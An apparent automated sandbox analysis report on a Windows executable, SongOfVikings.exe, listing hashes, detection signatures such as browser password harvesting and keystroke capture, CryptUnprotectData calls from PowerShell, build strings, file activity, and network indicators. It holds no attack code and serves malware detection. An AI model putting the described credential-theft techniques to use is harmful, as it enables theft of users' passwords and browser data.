Windows Analysis Report
SongOfVikings.exe

Overview

General Information

Sample name:	SongOfVikings.exe
Analysis ID:	1416898
MD5:	e66fb39c07d4e01d713fbac743f4ced7
SHA1:	6dec3465aef1404f63e939cbb03104bf1d476e97
SHA256:	0aed87372c8b6418f78abe020549e227175cae65f01713357afdbb7f7a839a34
Tags:	exe
Infos:

Detection

Score:	56
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Drops large PE files

Tries to harvest and steal browser information (history, passwords, etc)

Contains functionality for read data from the clipboard

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables security privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries keyboard layouts

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Stores files to the Windows start menu directory

Tries to load missing DLLs

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Signatures

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\db56a95c-619a-410d-ad51-8448947b0929.tmp.node

Virustotal: Detection: 6%

Perma Link

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFD9AFD4FEE CryptUnprotectData,		15_2_00007FFD9AFD4FEE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_00007FFD9AFE4FEE CryptUnprotectData,		18_2_00007FFD9AFE4FEE

Uses 32bit PE files

Source: SongOfVikings.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\SongOfVikings.exe

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\cdf7078b-99f0-53cc-bffc-b945975ddd33

Jump to behavior

Source: C:\Users\user\Desktop\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\LICENSE.electron.txt			Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Programs\SongOfVikings\LICENSE.electron.txt			Jump to behavior

Source: SongOfVikings.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: BCC = $(NCC) -nologo -W3 -Fd$*.pdb $(CCOPTS) $(BCCOPTS) source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: /c /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\INCLUDE\NODE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\SRC" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\OPENSSL\CONFIG" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\OPENSSL\OPENSSL\INCLUDE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\UV\INCLUDE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\ZLIB" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\V8\INCLUDE" /I"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\NODE_MODULES\NODE-ADDON-API" /I"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\BUILD\RELEASE\OBJ\GLOBAL_INTERMEDIATE\SQLITE-AUTOCONF-3440200" /Z7 /nologo /W3 /WX- /diagnostics:column /Ox /Ob2 /Oi /Ot /Oy /GL /D NODE_GYP_MODULE_NAME=node_sqlite3 /D USING_UV_SHARED=1 /D USING_V8_SHARED=1 /D V8_DEPRECATION_WARNINGS=1 /D V8_DEPRECATION_WARNINGS /D V8_IMMINENT_DEPRECATION_WARNINGS /D _GLIBCXX_USE_CXX11_ABI=1 /D ELECTRON_ENSURE_CONFIG_GYPI /D WIN32 /D _CRT_SECURE_NO_DEPRECATE /D _CRT_NONSTDC_NO_DEPRECATE /D _HAS_EXCEPTIONS=0 /D OPENSSL_NO_PINSHARED /D OPENSSL_THREADS /D NAPI_VERSION=8 /D NAPI_DISABLE_CPP_EXCEPTIONS=1 /D SQLITE_THREADSAFE=1 /D HAVE_USLEEP=1 /D SQLITE_ENABLE_FTS3 /D SQLITE_ENABLE_FTS4 /D SQLITE_ENABLE_FTS5 /D SQLITE_ENABLE_RTREE /D SQLITE_ENABLE_DBSTAT_VTAB=1 /D SQLITE_ENABLE_MATH_FUNCTIONS /D BUILDING_NODE_EXTENSION /D "HOST_BINARY=\"node.exe\"" /D NDEBUG /D _WINDLL /GF /Gm- /EHsc /MT /GS /Gy /fp:precise /Zc:wchar_t /Zc:forScope /Zc:inline /GR- /Fo"RELEASE\OBJ\NODE_SQLITE3\\SRC\NODE_SQLITE3.OBJ" /Fd"RELEASE\OBJ\NODE_SQLITE3\VC142.PDB" /external:W3 /Gd /TP /wd4351 /wd4355 /wd4800 /wd4251 /wd4275 /wd4244 /wd4267 /FC /Zc:__cplusplus -std:c++17 C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\SRC\NODE_SQLITE3.CC source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: del /Q .exp .lo .ilk .lib .obj .ncb .pdb .sdf *.suo 2>NUL source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Dev\elevate\bin\x86\Release\Elevate.pdb source: SongOfVikings.exe, 00000000.00000003.1907116496.0000000006529000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\BUILD\RELEASE\NODE_SQLITE3.PDB source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: LTCOMPILE = $(TCC) -Fo$@ -Fd$*.pdb source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: CLEANFILES="$CLEANFILES .lib .dll .pdb .exp" source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: /OUT:"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\BUILD\RELEASE\NODE_SQLITE3.NODE" /INCREMENTAL:NO /NOLOGO KERNEL32.LIB USER32.LIB GDI32.LIB WINSPOOL.LIB COMDLG32.LIB ADVAPI32.LIB SHELL32.LIB OLE32.LIB OLEAUT32.LIB UUID.LIB ODBC32.LIB DELAYIMP.LIB "C:\\USERS\\SERC\\.ELECTRON-GYP\\24.8.8\\X64\\NODE.LIB" DELAYIMP.LIB /DELAYLOAD:NODE.EXE /MANIFEST /MANIFESTUAC:"level='asInvoker' uiAccess='false'" /manifest:embed /DEBUG /PDB:"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\BUILD\RELEASE\NODE_SQLITE3.PDB" /OPT:REF /OPT:ICF /TLBID:1 /DYNAMICBASE /NXCOMPAT /MACHINE:X64 /LTCG:INCREMENTAL /ignore:4199 /DLL RELEASE\OBJ\NODE_SQLITE3\WIN_DELAY_LOAD_HOOK.OBJ source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: .$ac_ext \| .xcoff \| .tds \| .d \| .pdb \| .xSYM \| .bb \| .bbg \| .map \| .inf \| *.dSYM ) ;; source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\projects\src\out\Default\ffmpeg.dll.pdb source: SongOfVikings.exe, 00000000.00000003.1839965990.00000000051BD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\projects\src\out\Default\libGLESv2.dll.pdb source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\PROGRAM FILES (X86)\MICROSOFT VISUAL STUDIO\2019\ENTERPRISE\VC\TOOLS\MSVC\14.29.30133\LIB\X64\LIBCMT.AMD64.PDB source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: /c /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\INCLUDE\NODE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\SRC" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\OPENSSL\CONFIG" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\OPENSSL\OPENSSL\INCLUDE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\UV\INCLUDE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\ZLIB" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\V8\INCLUDE" /I"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\NODE_MODULES\NODE-ADDON-API" /I"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\BUILD\RELEASE\OBJ\GLOBAL_INTERMEDIATE\SQLITE-AUTOCONF-3440200" /Z7 /nologo /W3 /WX- /diagnostics:column /Ox /Ob2 /Oi /Ot /Oy /GL /D NODE_GYP_MODULE_NAME=node_sqlite3 /D USING_UV_SHARED=1 /D USING_V8_SHARED=1 /D V8_DEPRECATION_WARNINGS=1 /D V8_DEPRECATION_WARNINGS /D V8_IMMINENT_DEPRECATION_WARNINGS /D _GLIBCXX_USE_CXX11_ABI=1 /D ELECTRON_ENSURE_CONFIG_GYPI /D WIN32 /D _CRT_SECURE_NO_DEPRECATE /D _CRT_NONSTDC_NO_DEPRECATE /D _HAS_EXCEPTIONS=0 /D OPENSSL_NO_PINSHARED /D OPENSSL_THREADS /D NAPI_VERSION=8 /D NAPI_DISABLE_CPP_EXCEPTIONS=1 /D SQLITE_THREADSAFE=1 /D HAVE_USLEEP=1 /D SQLITE_ENABLE_FTS3 /D SQLITE_ENABLE_FTS4 /D SQLITE_ENABLE_FTS5 /D SQLITE_ENABLE_RTREE /D SQLITE_ENABLE_DBSTAT_VTAB=1 /D SQLITE_ENABLE_MATH_FUNCTIONS /D BUILDING_NODE_EXTENSION /D "HOST_BINARY=\"node.exe\"" /D NDEBUG /D _WINDLL /GF /Gm- /EHsc /MT /GS /Gy /fp:precise /Zc:wchar_t /Zc:forScope /Zc:inline /GR- /Fo"RELEASE\OBJ\NODE_SQLITE3\\" /Fd"RELEASE\OBJ\NODE_SQLITE3\VC142.PDB" /external:W3 /Gd /TP /wd4351 /wd4355 /wd4800 /wd4251 /wd4275 /wd4244 /wd4267 /FC /Zc:__cplusplus -std:c++17 C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\NODE-GYP\SRC\WIN_DELAY_LOAD_HOOK.CC source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\serc\Desktop\Telegram - Kopya\x\script\node_modules\sqlite3\build\Release\sqlite3.pdb source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: SQLITE3EXEPDB = /pdb:sqlite3sh.pdb source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ** rbu_file.pDb!=0, then it is assumed to already be present on the source: SongOfVikings.exe, 00000000.00000003.1774844208.0000000005710000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D3DCompiler_47.pdb source: SongOfVikings.exe, 00000000.00000003.1839026693.00000000051B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: -FdC:\Users\serc\Desktop\Telegram - Kopya\x\script\node_modules\sqlite3\build\Release\sqlite3.pdb source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: -typedil-fC:\Users\serc\Desktop\Telegram - Kopya\x\script\node_modules\node-gyp\src\win_delay_load_hook.cc-dos-Zi-Z7-W3-pdbrpc-Og-Ob2-Ot-EHs-MT-GS-Gy-FitObjFunc-FitObjData-NoRTTI-FoC:\Users\serc\Desktop\Telegram - Kopya\x\script\node_modules\sqlite3\build\deps\Release\obj\sqlite3\win_delay_load_hook.obj-FdC:\Users\serc\Desktop\Telegram - Kopya\x\script\node_modules\sqlite3\build\Release\sqlite3.pdb-errorreport:queue source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\projects\src\out\Default\electron.exe.pdb source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D3DCompiler_47.pdbGCTL source: SongOfVikings.exe, 00000000.00000003.1839026693.00000000051B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\PROGRAM FILES (X86)\MICROSOFT VISUAL STUDIO\2019\ENTERPRISE\VC\TOOLS\MSVC\14.29.30133\LIB\X64\LIBVCRUNTIME.AMD64.PDB source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: BCC = $(NCC) -nologo -W4 -Fd$*.pdb $(CCOPTS) $(BCCOPTS) source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: .$ac_ext \| .xcoff \| .tds \| .d \| .pdb \| .xSYM \| .bb \| .bbg \| .map \| .inf \| .dSYM \| .o \| *.obj ) ;; source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: .$ac_ext \| .xcoff \| .tds \| .d \| .pdb \| .xSYM \| .bb \| .bbg \| .map \| .inf \| .dSYM \| .o \| *.obj ) source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\projects\src\out\Default\vk_swiftshader.dll.pdb source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1902908317.00000000051B1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: /c /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\INCLUDE\NODE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\SRC" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\OPENSSL\CONFIG" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\OPENSSL\OPENSSL\INCLUDE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\UV\INCLUDE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\ZLIB" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\V8\INCLUDE" /I"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\NODE_MODULES\NODE-ADDON-API" /I"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\BUILD\RELEASE\OBJ\GLOBAL_INTERMEDIATE\SQLITE-AUTOCONF-3440200" /Z7 /nologo /W3 /WX- /diagnostics:column /Ox /Ob2 /Oi /Ot /Oy /GL /D NODE_GYP_MODULE_NAME=node_sqlite3 /D USING_UV_SHARED=1 /D USING_V8_SHARED=1 /D V8_DEPRECATION_WARNINGS=1 /D V8_DEPRECATION_WARNINGS /D V8_IMMINENT_DEPRECATION_WARNINGS /D _GLIBCXX_USE_CXX11_ABI=1 /D ELECTRON_ENSURE_CONFIG_GYPI /D WIN32 /D _CRT_SECURE_NO_DEPRECATE /D _CRT_NONSTDC_NO_DEPRECATE /D _HAS_EXCEPTIONS=0 /D OPENSSL_NO_PINSHARED /D OPENSSL_THREADS /D NAPI_VERSION=8 /D NAPI_DISABLE_CPP_EXCEPTIONS=1 /D SQLITE_THREADSAFE=1 /D HAVE_USLEEP=1 /D SQLITE_ENABLE_FTS3 /D SQLITE_ENABLE_FTS4 /D SQLITE_ENABLE_FTS5 /D SQLITE_ENABLE_RTREE /D SQLITE_ENABLE_DBSTAT_VTAB=1 /D SQLITE_ENABLE_MATH_FUNCTIONS /D BUILDING_NODE_EXTENSION /D "HOST_BINARY=\"node.exe\"" /D NDEBUG /D _WINDLL /GF /Gm- /EHsc /MT /GS /Gy /fp:precise /Zc:wchar_t /Zc:forScope /Zc:inline /GR- /Fo"RELEASE\OBJ\NODE_SQLITE3\\SRC\BACKUP.OBJ" /Fd"RELEASE\OBJ\NODE_SQLITE3\VC142.PDB" /external:W3 /Gd /TP /wd4351 /wd4355 /wd4800 /wd4251 /wd4275 /wd4244 /wd4267 /FC /Zc:__cplusplus -std:c++17 C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\SRC\BACKUP.CC source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: /c /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\INCLUDE\NODE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\SRC" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\OPENSSL\CONFIG" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\OPENSSL\OPENSSL\INCLUDE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\UV\INCLUDE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\ZLIB" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\V8\INCLUDE" /I"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\NODE_MODULES\NODE-ADDON-API" /I"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\BUILD\RELEASE\OBJ\GLOBAL_INTERMEDIATE\SQLITE-AUTOCONF-3440200" /Z7 /nologo /W3 /WX- /diagnostics:column /Ox /Ob2 /Oi /Ot /Oy /GL /D NODE_GYP_MODULE_NAME=node_sqlite3 /D USING_UV_SHARED=1 /D USING_V8_SHARED=1 /D V8_DEPRECATION_WARNINGS=1 /D V8_DEPRECATION_WARNINGS /D V8_IMMINENT_DEPRECATION_WARNINGS /D _GLIBCXX_USE_CXX11_ABI=1 /D ELECTRON_ENSURE_CONFIG_GYPI /D WIN32 /D _CRT_SECURE_NO_DEPRECATE /D _CRT_NONSTDC_NO_DEPRECATE /D _HAS_EXCEPTIONS=0 /D OPENSSL_NO_PINSHARED /D OPENSSL_THREADS /D NAPI_VERSION=8 /D NAPI_DISABLE_CPP_EXCEPTIONS=1 /D SQLITE_THREADSAFE=1 /D HAVE_USLEEP=1 /D SQLITE_ENABLE_FTS3 /D SQLITE_ENABLE_FTS4 /D SQLITE_ENABLE_FTS5 /D SQLITE_ENABLE_RTREE /D SQLITE_ENABLE_DBSTAT_VTAB=1 /D SQLITE_ENABLE_MATH_FUNCTIONS /D BUILDING_NODE_EXTENSION /D "HOST_BINARY=\"node.exe\"" /D NDEBUG /D _WINDLL /GF /Gm- /EHsc /MT /GS /Gy /fp:precise /Zc:wchar_t /Zc:forScope /Zc:inline /GR- /Fo"RELEASE\OBJ\NODE_SQLITE3\\SRC\STATEMENT.OBJ" /Fd"RELEASE\OBJ\NODE_SQLITE3\VC142.PDB" /external:W3 /Gd /TP /wd4351 /wd4355 /wd4800 /wd4251 /wd4275 /wd4244 /wd4267 /FC /Zc:__cplusplus -std:c++17 C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\SRC\STATEMENT.CC source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ** for all file descriptors with rbu_file.pDb!=0. If the argument has source: SongOfVikings.exe, 00000000.00000003.1774844208.0000000005710000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\PROGRAM FILES (X86)\MICROSOFT VISUAL STUDIO\2019\ENTERPRISE\VC\TOOLS\MSVC\14.29.30133\LIB\X64\LIBCPMT.AMD64.PDB source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: /c /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\INCLUDE\NODE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\SRC" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\OPENSSL\CONFIG" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\OPENSSL\OPENSSL\INCLUDE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\UV\INCLUDE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\ZLIB" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\V8\INCLUDE" /I"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\NODE_MODULES\NODE-ADDON-API" /I"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\BUILD\RELEASE\OBJ\GLOBAL_INTERMEDIATE\SQLITE-AUTOCONF-3440200" /Z7 /nologo /W3 /WX- /diagnostics:column /Ox /Ob2 /Oi /Ot /Oy /GL /D NODE_GYP_MODULE_NAME=node_sqlite3 /D USING_UV_SHARED=1 /D USING_V8_SHARED=1 /D V8_DEPRECATION_WARNINGS=1 /D V8_DEPRECATION_WARNINGS /D V8_IMMINENT_DEPRECATION_WARNINGS /D _GLIBCXX_USE_CXX11_ABI=1 /D ELECTRON_ENSURE_CONFIG_GYPI /D WIN32 /D _CRT_SECURE_NO_DEPRECATE /D _CRT_NONSTDC_NO_DEPRECATE /D _HAS_EXCEPTIONS=0 /D OPENSSL_NO_PINSHARED /D OPENSSL_THREADS /D NAPI_VERSION=8 /D NAPI_DISABLE_CPP_EXCEPTIONS=1 /D SQLITE_THREADSAFE=1 /D HAVE_USLEEP=1 /D SQLITE_ENABLE_FTS3 /D SQLITE_ENABLE_FTS4 /D SQLITE_ENABLE_FTS5 /D SQLITE_ENABLE_RTREE /D SQLITE_ENABLE_DBSTAT_VTAB=1 /D SQLITE_ENABLE_MATH_FUNCTIONS /D BUILDING_NODE_EXTENSION /D "HOST_BINARY=\"node.exe\"" /D NDEBUG /D _WINDLL /GF /Gm- /EHsc /MT /GS /Gy /fp:precise /Zc:wchar_t /Zc:forScope /Zc:inline /GR- /Fo"RELEASE\OBJ\NODE_SQLITE3\\SRC\DATABASE.OBJ" /Fd"RELEASE\OBJ\NODE_SQLITE3\VC142.PDB" /external:W3 /Gd /TP /wd4351 /wd4355 /wd4800 /wd4251 /wd4275 /wd4244 /wd4267 /FC /Zc:__cplusplus -std:c++17 C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\SRC\DATABASE.CC source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ** rbu_file.pDb!=0. source: SongOfVikings.exe, 00000000.00000003.1774844208.0000000005710000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\projects\src\out\Default\vulkan-1.dll.pdb source: SongOfVikings.exe, 00000000.00000003.1834103716.0000000005A90000.00000004.00001000.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1833977942.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1835988710.0000000005AD0000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\SongOfVikings.exe	Code function: 0_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_004059CC
Source: C:\Users\user\Desktop\SongOfVikings.exe	Code function: 0_2_004065FD FindFirstFileW,FindClose,	0_2_004065FD
Source: C:\Users\user\Desktop\SongOfVikings.exe	Code function: 0_2_00402868 FindFirstFileW,	0_2_00402868

Source: C:\Users\user\Desktop\SongOfVikings.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	File opened: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	File opened: C:\Users\user\AppData\Local\Programs\SongOfVikings	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	File opened: C:\Users\user\AppData\Local\Programs	Jump to behavior

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 172.64.41.3 172.64.41.3
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152

May check the online IP address of the machine

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
